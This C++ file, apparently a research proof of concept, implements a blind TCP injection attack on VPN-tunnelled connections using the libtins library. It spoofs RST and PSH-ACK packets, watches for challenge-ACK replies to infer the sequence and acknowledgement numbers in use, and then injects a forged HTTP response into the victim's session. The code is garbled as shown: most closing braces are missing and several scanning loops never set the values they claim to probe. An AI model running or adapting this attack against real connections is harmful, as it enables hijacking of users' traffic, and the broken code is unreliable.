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695 lines
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695 lines
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#include <tins/tins.h>
#include <cassert>
#include <iostream>
#include <string>
#include <unistd.h>
#include <thread>
using std::thread;
using std::cout;
using std::vector;
using namespace Tins;
long current_spoof_seq;
long current_spoof_ack;
long current_min_ack;
long best_seq = 0;
long best_ack;
vector<long> possible_seqs;
vector<long> possible_acks;
int num_sent = 0;
int current_round = 1;
bool ack_search = false;
bool track_nums = false;
bool count_chacks = false;
bool sniffed_chack = false;
bool show = false;
bool testing = true; // if using netcat set to true, else false
int sniff_request = 0; // 0 = off, 1 = sniffing for request, 2 = sniffed that request
std::string victim_wlan_addr, dest_ip, remote_addr, interface;
int sport, dport, request_size, chack_count;
std::string dest_mac = "";
std::string src_mac = "";
void print_divider(int count) {
int i = 0;
while (i < count) {
cout << "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
// Injects a malicious payload with the exact seq
// and in-window ack inferred before
int inject_junk(long exact_seq, long in_win_ack) {
PacketSender sender;
NetworkInterface iface(interface);
std::string message = "HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=utf-8\r\nContent-Length: 84\r\nConnection: keep-alive\r\n\r\n<h1><a href=\"\">Just some junk here..</a></h1>";
IP pkt = IP(dest_ip, remote_addr) / TCP(dport, sport) / RawPDU(message);
TCP& tcp = pkt.rfind_pdu<TCP>();
tcp.set_flag(TCP::PSH, 1);
tcp.set_flag(TCP::ACK, 1);
cout << "attempting to inject garbage into the connection..\n";
cout << "injected seq: " << exact_seq << ", in-win ack: " << in_win_ack << "\n";
sender.send(pkt, iface);
num_sent ++;
return 1;
// Send the same probe a number of times
// to see if the same amount of responses are
// triggered from the client
bool rechack(long seq, long ack, int num_checks) {
PacketSender sender;
NetworkInterface iface(interface);
count_chacks = true;
IP pkt = IP(dest_ip, remote_addr) / TCP(dport, sport) / RawPDU("");
TCP& tcp = pkt.rfind_pdu<TCP>();
if (ack == 0) {
tcp.set_flag(TCP::RST, 1);
} else {
tcp.set_flag(TCP::PSH, 1);
tcp.set_flag(TCP::ACK, 1);
chack_count = 0;
int count = 0;
usleep(1000000 / 2);
while (count < num_checks) {
sender.send(pkt, iface);
num_sent ++;
usleep(1000000 / 2 * 1.2); // must sleep half second due to chall-ack rate limit
count ++;
// should have just sniffed as many chacks as we just sent
cout << "end of rechack, count was: " << chack_count << ", should be: " << num_checks << " \n";
if (chack_count >= num_checks) {
return true;
count_chacks = false;
return false;
// Use the fact the client will respond to empty PSH-ACKs
// that have an in window ack AND a sequence number less than the exact
// next expected sequence, with chall-acks to infer exact sequence num
long find_exact_seq(long in_win_seq, long in_win_ack, int send_delay) {
PacketSender sender;
NetworkInterface iface(interface);
IP pkt = IP(dest_ip, remote_addr) / TCP(dport, sport) / RawPDU("");
TCP& tcp = pkt.rfind_pdu<TCP>();
tcp.set_flag(TCP::PSH, 1);
tcp.set_flag(TCP::ACK, 1);
count_chacks = false;
track_nums = false;
long min_seq = in_win_seq - 200; // assuming the in_window_seq is within 200 of the left edge of window
sniffed_chack = false;
long curr_seq = in_win_seq;
// Continually decrement the in window sequence number
// until we sniff a chack which means we just passed the
// left edge of the sequence window
bool is_found = false;
while (!is_found) {
long j = curr_seq;
sniffed_chack = false;
while (j > min_seq && !sniffed_chack) {
cout << "spoofing with seq: " << j << "\n";
sender.send(pkt, iface);
num_sent ++;
j -= 1;
curr_seq = best_seq;
cout << "best seq at end of exact scan: " << curr_seq << "\n";
is_found = rechack(curr_seq, in_win_ack, 2);
if (show) cout << "exact seq was in win after rechack? " << is_found << "\n";
return curr_seq;
// Use the fact the client will respond to empty PSH-ACKs
// that have an in window sequence number AND ack number less than the
// ack number in use with chall-acks to infer an in-window ack number
long find_ack_block(long max_ack, long min_ack, long in_win_seq, long block_size, int send_delay, bool verbose, int chack_trigs) {
PacketSender sender;
NetworkInterface iface(interface);
// Loop over ack space sending empty push-acks
// that use the in window sequence number found before
IP pkt = IP(dest_ip, remote_addr) / TCP(dport, sport) / RawPDU("");
TCP& tcp = pkt.rfind_pdu<TCP>();
tcp.set_flag(TCP::PSH, 1);
tcp.set_flag(TCP::ACK, 1);
sniffed_chack = false;
chack_count = 0;
count_chacks = true;
track_nums = true;
current_min_ack = min_ack;
long j = max_ack;
long current_ack = 0;
best_ack = 0;
while (j > min_ack && chack_count < chack_trigs) {
sender.send(pkt, iface);
num_sent ++;
if (verbose && show) cout << "spoofing with ack: " << j << "\n";
if (j < 100000000) { // for tiny ack range
j -= block_size / 100;
} else {
j -= block_size;
for (int i = 0; i < possible_acks.size(); i ++) {
long cack = possible_acks[i];
if (cack > current_ack) current_ack = cack;
cout << "best ack at end of ack scan: " << current_ack << "\n";
track_nums = false;
return current_ack;
// Finds the "quiet" portion of the ack range to
// start scanning and then begins to find an approx
// ack block close to the one being used
long quack_spread(long in_win_seq) {
cout << "starting quack spread w seq: " << in_win_seq << "\n";
long start_ack_guess = 4294967294 / 2;
long end_ack_guess = 100;
long block_size = 100000000;
sniffed_chack = false; // assume its gonna find an ack here first
// if the actual ack is less than half of the max_ack allowed,
// then it will consider acks at the very top end of the ack space (~429.....)
// to be less than that small ack. therefore, we check if the max ack
// triggers chacks right away, if so then we half the start_ack guess (~214....)
bool triggering = rechack(in_win_seq, start_ack_guess, 3);
cout << "is ack in upper half? " << triggering << "\n";
if (triggering) { // then we know the ack is in the lower half of the ack space
start_ack_guess = start_ack_guess * 2;
long j = start_ack_guess;
sniffed_chack = false;
// Now continually decrement ack until we trigger another chack
int send_delay = 75000;
bool is_found = false;
long current_ack = 0;
while (!is_found) {
current_ack = find_ack_block(start_ack_guess, 0, in_win_seq, block_size, send_delay, true, 1);
cout << "finished quiet block spread, guessed quiet block ack: " << current_ack << "\n";
// recheck and send multiple to make sure we found correct ack block
is_found = rechack(in_win_seq, current_ack, 2);
if (show) cout << "was in win after rechack? " << is_found << "\n";
if (!is_found) start_ack_guess = current_ack;
return current_ack;
// Use the fact the client will respond to RSTs
// with an in-window sequence number with chall-acks to
// infer an in-window seq number
long find_seq_block(long prev_block_size, long new_block_size, long delay_mult, long send_delay, long top_seq) {
PacketSender sender;
NetworkInterface iface(interface);
long max_seq = top_seq;
long adder = prev_block_size * delay_mult;
cout << "starting round " << current_round << " spread at: " << (max_seq - adder) << "\n";
IP pkt = IP(dest_ip, remote_addr) / TCP(dport, sport);
TCP& tcp = pkt.rfind_pdu<TCP>();
tcp.set_flag(TCP::RST, 1);
long i;
for (i = (max_seq - adder); i < max_seq; i += new_block_size) {
sender.send(pkt, iface);
num_sent ++;
cout << "finished round " << current_round << " spread, guessed in window seq: " << best_seq << "\n";
return best_seq;
// Attempt to sniff challenge acks while recording
// the last sequence or ack number we spoofed
bool handle_packet(PDU &some_pdu) {
const IP &ip = some_pdu.rfind_pdu<IP>();
if (ack_search) {
// keep track of the last ack num we spoofed
if (ip.src_addr() == remote_addr) current_spoof_ack = some_pdu.rfind_pdu<TCP>().ack_seq();
if (ip.src_addr() == victim_wlan_addr) {
const uint32_t& payload = some_pdu.rfind_pdu<RawPDU>().payload_size();
//cout << payload << "\n";
if (payload == 115) { // each triggered chall-ack is 115 length SSL
if (show) cout << "sniffed chack w ack: " << (current_spoof_ack) << "\n";
if (count_chacks) chack_count += 1;
if (track_nums) possible_acks.push_back(current_spoof_ack);
if (current_spoof_ack > current_min_ack) best_ack = current_spoof_ack;
sniffed_chack = true;
} else if (sniff_request == 1) {
// sniffing for a certain client request size (last step after finding seq and ack)
if (ip.src_addr() == victim_wlan_addr) {
const uint32_t& payload = some_pdu.rfind_pdu<RawPDU>().payload_size();
cout << "sniffed cli request of size " << payload << "\n";
if (payload == request_size) {
sniff_request = 2;
} else { // sniffing for chack during sequence search
// keep track of the last sequence num we spoofed
if (ip.src_addr() == remote_addr) current_spoof_seq = some_pdu.rfind_pdu<TCP>().seq();
if (ip.src_addr() == victim_wlan_addr) {
const uint32_t& payload = some_pdu.rfind_pdu<RawPDU>().payload_size();
//cout << payload << "\n";
if (payload == 115) { // each triggered chall-ack is 1 length15 SSL
if (show) cout << "sniffed chack w seq: " << (current_spoof_seq) << "\n";
if (track_nums) {
best_seq = current_spoof_seq;
} else if (count_chacks) { //
chack_count += 1;
best_seq = current_spoof_seq;
} else {
if (!sniffed_chack) {
if (best_seq == 0) { // still in initial seq spread
best_seq = current_spoof_seq;
sniffed_chack = true;
} else {
// make sure new seq is less than the previous sniffed one
if (current_spoof_seq < best_seq) {
best_seq = current_spoof_seq;
sniffed_chack = true;
return true;
void sniff_stuff() {
SnifferConfiguration config;
Sniffer sniffer(interface, config);
sniffer.sniff_loop(handle_packet); // call the handle function for each sniffed pack
// Try to find an in window sequence number using
// one of the very rough estimates found in the first
// sequence spread
long try_seq_block(long current_seq) {
// Just did round 1 spoofing fast to get rough estimate of
// in window sequence number, now we send a round 2 and 3 spreads
// using the approximated seq with lower send rates
current_round = 2;
sniffed_chack = false;
int wait_count = 0;
best_seq = current_seq;
usleep(1000000 / 2);
// this will take into account the last block size of 50k,
// skip in blocks of 1055 seq nums per send, assume the last
// rounds delay was 80 packets for a response, and send every 150 msecs
long s1 = find_seq_block(50000, 1055, 80, 150, current_seq);
while (best_seq == current_seq) {
if (show) cout << "waiting on round 2 chack..\n"; // return -1 if waiting too long
wait_count +=1;
if (wait_count > 5) return -1;
// Now we should have a close estimate to an in-window seq
// so next do a third scan at much slower rate to ensure its
// an in-window sequence num
usleep(1000000 / 2);
sniffed_chack = false;
current_round += 1;
current_seq = best_seq;
wait_count = 0;
long s2 = find_seq_block(1055, 20, 50, 600, current_seq);
while (best_seq == current_seq) {
if (show) cout << "waiting on round 3 chack..\n";
wait_count +=1;
if (wait_count > 5) return -1;
return best_seq;
// Gets rough estimate of sequence number in use
// by spreading entire sequence range quickly then
// tries to find in win sequence using each
long find_in_win_seq() {
PacketSender sender;
NetworkInterface iface(interface);
long start_seq_guess = 1;
long max_seq_num = 4294967295;
track_nums = true; // phase 1 is so fast it sniffs false seq nums so we try each
cout << "spreading the connections entire sequence number range...\n";
usleep(1000000 / 2);
IP pkt = IP(dest_ip, remote_addr) / TCP(dport, sport);
TCP& tcp = pkt.rfind_pdu<TCP>();
tcp.set_flag(TCP::RST, 1);
long i;
for (i = start_seq_guess; i < max_seq_num; i += 50000) { // sends to the whole sequence num space
sender.send(pkt, iface);
num_sent ++;
cout << "finished round 1 spread, guessed in window seq: " << best_seq << "\n";
track_nums = false;
int j = 0;
long in_win_seq = -1;
while (j < possible_seqs.size() && in_win_seq == -1) { // try each possible seq block
current_round = 0;
if (show) cout << "trying to find in window seq around " << possible_seqs[j] << "\n";
in_win_seq = try_seq_block(possible_seqs[j]);
j ++;
if (show) cout << "in win seq after try? " << in_win_seq << "\n";
usleep(1000000 / 2);
track_nums = false;
usleep(1000000 / 2);
return best_seq;
// Send two spoof rounds while increasing the send delay and
// decreasing block size to quickly get in-win ack estimate
long find_in_win_ack(long in_win_seq) {
// quack should be below current ack in use but we only rechack once first round
ack_search = true;
long quack = quack_spread(in_win_seq);
// Spoof empty PSH-ACKs starting at 'quack' plus some send delay
// until we sniff a chack and know we just went below the left
// edge of the ack window
long block_size = 10000;
int send_delay = 500;
long max_ack = quack + (1 * 100000000);
long min_ack = quack;
long clack;
bool is_found = false;
while (!is_found) { // retry ack scan until we find block triggering chacks
cout << "starting round 1 ack scan w min: " << min_ack << " and max: " << max_ack << "\n";
clack = find_ack_block(max_ack, min_ack, in_win_seq, block_size, send_delay, false, 2);
is_found = rechack(in_win_seq, clack, 2);
if (show) cout << "was in win after rechack? " << is_found << "\n";
int i = 0;
while (!is_found && i < possible_acks.size()) {
long some_ack = possible_acks[i];
if (show) cout << "finished ack scan 1 w possible in window ack: " << some_ack << "\n";
is_found = rechack(in_win_seq, some_ack, 2);
if (show) cout << "was in win after rechack? " << is_found << "\n";
i ++;
if (is_found) clack = some_ack;
max_ack = clack;
// clack should be an in window ack so now we have both in window
// sequence and in window ack numbers.
ack_search = false;
track_nums = false;
// clack has been consistently within 40k of next ack while testing but
// in practical use it needs to be less than the expected ack by at most
// 20k to be accepted as a valid ack, so here we add 30k to counter our delay
// but we could add a third ack scan to make it more accurate
long in_win_ack = clack + 30000;
return in_win_ack;
// After we've found exact seq and in-win ack, attacker waits
// for a specific request size to inject the response into
int wait_for_request(long exact_seq, long in_win_ack) {
sniff_request = 1;
int res = 0;
while (sniff_request != 2) {
if (show) cout << "waiting for request of size..\n";
if(show) cout << "Sniffed request packet to respond to\n";
res = inject_junk(exact_seq, in_win_ack);
return res;
// Attempt to infer the exact sequence number
// and in-window ack in use by the connection
int phase_three_spread() {
bool is_found = false;
long in_win_seq = 0;
// Loop until we find in window seq
while (!is_found) {
in_win_seq = find_in_win_seq();
is_found = rechack(in_win_seq, 0, 2);
cout << "approx seq: " << in_win_seq << " was in win after rechack? " << is_found << "\n";
if (!is_found) usleep(1000000 / 2);
// At this point we should have an in-window sequence number and
// next step is to find an in-window ack number for the connection
usleep(1000000 / 2);
long in_win_ack = find_in_win_ack(in_win_seq);
cout << "scanning for exact sequence num w in-win ack: " << in_win_ack << "\n";
long exact_seq = find_exact_seq(in_win_seq - 100, in_win_ack, 100000) + 1; // should be one less than left edge
cout << "final exact seq guess: " << exact_seq << "\n";
cout << "total number of packets sent: " << num_sent << "\n";
int res = 0;
if (testing) { // for netcat
res = inject_junk(exact_seq, in_win_ack);
} else { // for normal http injection
cout << "waiting for client to request any page within inferred connection...";
res = wait_for_request(exact_seq, in_win_ack);
return res;
int main(int argc, char** argv) {
if (argc != 8) {
cout << "sike wrong number of args ---> (remote_ip, sport, victim_pub_ip, vpn_ip, dport, request_size, iface)\n";
return 0;
remote_addr = argv[1];
sport = atoi(argv[2]);
victim_wlan_addr = argv[3];
dest_ip = argv[4];
//dest_mac = argv[5];
dport = atoi(argv[5]);
request_size = atoi(argv[6]);
interface = argv[7];
thread sniff_thread(sniff_stuff);
int r = phase_three_spread();
return 0;